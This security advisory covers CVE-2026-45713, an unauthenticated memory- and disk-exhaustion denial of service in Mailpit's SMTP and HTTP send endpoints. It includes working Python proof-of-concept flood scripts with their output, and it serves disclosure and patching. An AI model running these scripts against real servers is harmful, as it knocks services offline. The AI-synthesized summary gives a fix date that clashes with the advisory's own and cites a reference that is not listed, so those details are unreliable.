VYPR
← All advisories
High severity7.5GHSA Advisory· Published May 19, 2026· Updated May 19, 2026

Mailpit: Unauthenticated remote memory-exhaustion DoS via unlimited SMTP DATA and /api/v1/send body sizes

CVE-2026-45713

Description

Summary

The Mailpit SMTP server has a Server.MaxSize int field that controls the maximum allowed DATA payload size, but the field is never assigned anywhere outside test code, leaving it at Go's zero value (0 ⇒ "no limit"). The same applies to the HTTP /api/v1/send endpoint, whose request body is decoded with json.NewDecoder(r.Body) and no http.MaxBytesReader. Because Mailpit's default listeners bind [::]:1025 (SMTP) and [::]:8025 (HTTP), with no authentication required on either, a single network-reachable attacker can push an arbitrarily large message into Mailpit and watch RAM consumption spike with a ~7-10× amplification factor (raw frame → enmime envelope tree → search-text index → zstd-encoded write to SQLite). Repeating the attack — or running it concurrently from multiple connections — drives the process to OOM-kill.

Details

Pre-auth, remote DoS on every Mailpit deployment running the default configuration. Memory is the primary axis; disk is a secondary one, because each oversized message is also persisted to the SQLite store (config.MaxMessages caps the count at 500 but never the bytes — so 500 attacker-sized messages × 1 GiB each = ~500 GiB on the host disk before the LRU rotates).

Affected code internal/smtpd/smtpd.go:107 — the field exists:

type Server struct {
    ...
    MaxSize int // Maximum message size allowed, in bytes
    ...
}

internal/smtpd/smtpd.go:863-877 — the enforcement is gated on > 0:

for {
    ...
    line, err := s.br.ReadBytes('\n')
    if err != nil {
        return nil, err
    }
    if bytes.Equal(line, []byte(".\r\n")) {
        break
    }
    if line[0] == '.' {
        line = line[1:]
    }

    if s.srv.MaxSize > 0 {                                   // ← only when set
        if len(data)+len(line) > s.srv.MaxSize {
            _, _ = s.br.Discard(s.br.Buffered())
            return nil, maxSizeExceeded(s.srv.MaxSize)
        }
    }
    data = append(data, line...)                             // ← otherwise grows unbounded
}

internal/smtpd/main.go:223-248 — the field is never populated; grep -rn "MaxSize" cmd/ config/ returns zero hits. There is no --smtp-max-message-size CLI flag, no MP_SMTP_MAX_MESSAGE_SIZE env var.

server/apiv1/send.go:45-52 — HTTP path has the same defect:

decoder := json.NewDecoder(r.Body)
data := sendMessageParams{}
if err := decoder.Decode(&data.Body); err != nil {
    httpJSONError(w, err.Error())
    return
}

No r.Body = http.MaxBytesReader(w, r.Body, N) wrapper; server.ReadTimeout of 30 s is transmission-time, not body-size-budget.

PoC

Baseline RSS on a freshly-started binary: 25 MiB. After one 100 MiB SMTP DATA block: ~1 037 MiB (≈10× amplification, single connection, no auth):

#!/usr/bin/env python3
# poc-smtp-dos.py
import socket, sys
host, port = sys.argv[1], int(sys.argv[2])
mb         = int(sys.argv[3])  # message size, MiB

s = socket.create_connection((host, port), timeout=120)
def r(): return s.recv(4096).decode("latin-1", "replace").strip()
print(r())
for cmd in [b"HELO x\r\n",
            b"MAIL FROM:<a@b.com>\r\n",
            b"RCPT TO:<c@d.com>\r\n",
            b"DATA\r\n"]:
    s.sendall(cmd); print(r())
s.sendall(b"Subject: oversize\r\n\r\n")
chunk = b"X" * (1024 * 1024)
for _ in range(mb): s.sendall(chunk)
s.sendall(b"\r\n.\r\n")
print(r()); s.close()

$ python3 poc-smtp-dos.py 127.0.0.1 1025 100
220 hostname Mailpit ESMTP Service ready
250 hostname greets x
250 2.1.0 Ok
250 2.1.5 Ok
354 Start mail input; end with .
250 2.0.0 Ok: queued as 58rI69JTJYjVFwogEbw9Jj

$ ps -o rss= -p $(pgrep -f /usr/local/bin/mailpit)
1062848    # ≈ 1 037 MiB, up from 25 MiB baseline

Equivalent over HTTP:

# poc-http-dos.py
import socket, sys
host, port, mb = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])
prefix = b'{"From":{"Email":"a@b.com"},"To":[{"Email":"c@d.com"}],"Subject":"big","Text":"'
suffix = b'"}'
N      = mb * 1024 * 1024
clen   = len(prefix) + N + len(suffix)

s = socket.create_connection((host, port), timeout=120)
s.sendall(
    b"POST /api/v1/send HTTP/1.1\r\n"
    b"Host: x\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: " + str(clen).encode() + b"\r\n"
    b"Connection: close\r\n\r\n")
s.sendall(prefix)
chunk = b"X" * (1024 * 1024)
for _ in range(mb): s.sendall(chunk)
s.sendall(suffix)
print(s.recv(500).decode("latin-1", "replace"))

$ python3 poc-http-dos.py 127.0.0.1 8025 200
HTTP/1.1 200 OK
...
$ ps -o rss= -p $(pgrep -f /usr/local/bin/mailpit)
2147000      # comfortably above 2 GiB on the same process

Five concurrent SMTP connections × 50 MiB each took the same machine from 25 MiB → 1 970 MiB during the attack window. With sufficient bandwidth the only ceiling is host RAM.

Impact

Unauthenticated remote attackers can send arbitrarily large emails via SMTP or HTTP, causing unbounded memory and disk growth, leading to out-of-memory (OOM) kills and full Mailpit process crash (DoS)

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Mailpit SMTP & HTTP API accept unlimited message sizes, causing pre-auth remote memory-exhaustion DoS with ~7-10× amplification.

Vulnerability

Mailpit’s SMTP server and the HTTP /api/v1/send endpoint accept arbitrarily large message payloads because the Server.MaxSize field (intended to cap DATA size) is never assigned outside test code and remains at Go’s zero value 0 (meaning no limit). The HTTP endpoint uses json.NewDecoder(r.Body) without http.MaxBytesReader. Both default listeners bind [::]:1025 (SMTP) and [::]:8025 (HTTP) with no authentication required. The issue affects all versions prior to v1.30.0 [1][2].

Exploitation

An attacker with network access to either the SMTP or HTTP port can send a single oversized message — for example, many gigabytes of DATA in SMTP’s DATA command or a large JSON body to /api/v1/send. No authentication or user interaction is required. The message undergoes memory‑intensive processing (parsing into an enmime envelope tree, building search‑text index, and zstd‑compressing before writing to SQLite) with a ~7–10× RAM amplification factor. The attacker can repeat the send or open concurrent connections to accelerate exhaustion [1][2].

Impact

Successful exploitation causes the Mailpit process to consume all available RAM, leading to an out‑of‑memory (OOM) kill by the kernel (Denial of Service). Additionally, each oversized message is persisted to the SQLite store; the configurable MaxMessages count (default 500) caps the number of messages but not total bytes, so repeated attacks can also fill the host disk with hundreds of gigabytes before old messages are pruned. The attacker gains no code execution or data access [1][2].

Mitigation

Version v1.30.0 (released 2025‑05‑16 for the fix) introduces a default per‑message size limit of 50 MB for both SMTP and the API endpoint (api/v1/send). This limit is configurable or can be disabled. Users should upgrade immediately. If upgrading is not possible, a workaround is to place Mailpit behind a network firewall or reverse proxy that enforces request‑body size limits, or restrict network access to trusted hosts only [4].

References
  1. CVE-2026-45713 - GitHub Advisory Database
  2. Unauthenticated remote memory-exhaustion DoS via unlimited SMTP DATA and /api/v1/send body sizes
  3. Release v1.30.0 · axllent/mailpit

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Axllent/MailpitGHSA2 versions
    < 1.30.0+ 1 more
    • (no CPE)range: < 1.30.0
    • (no CPE)

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

3

News mentions

0

No linked articles in our index yet.